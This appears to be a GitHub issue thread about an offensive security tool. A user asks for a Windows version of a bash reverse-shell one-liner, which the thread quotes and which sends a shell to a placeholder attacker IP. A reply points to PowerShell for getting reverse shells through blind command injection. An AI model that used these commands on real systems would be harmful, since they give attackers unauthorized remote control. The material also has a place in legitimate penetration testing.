You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
please if we have a windows server
how to interact with a metasploit windows listner.
i want the équivalent command to this one : /bin/bash -i > /dev/tcp/attacker_IP/4444 0>&1 2>&1
thx
The text was updated successfully, but these errors were encountered:
In some cases you can use the solution mentioned by @p4r71cl3. In another cases (when you making blind command injection) you need to use powershell to get a reverse shell in a windows environment.
Soon I'll include a new payload to easily get a reverse shell on any platform (windows and *nix). This is ready.
hello
thx for this good job
please if we have a windows server
how to interact with a metasploit windows listner.
i want the équivalent command to this one :
/bin/bash -i > /dev/tcp/attacker_IP/4444 0>&1 2>&1
thx
The text was updated successfully, but these errors were encountered: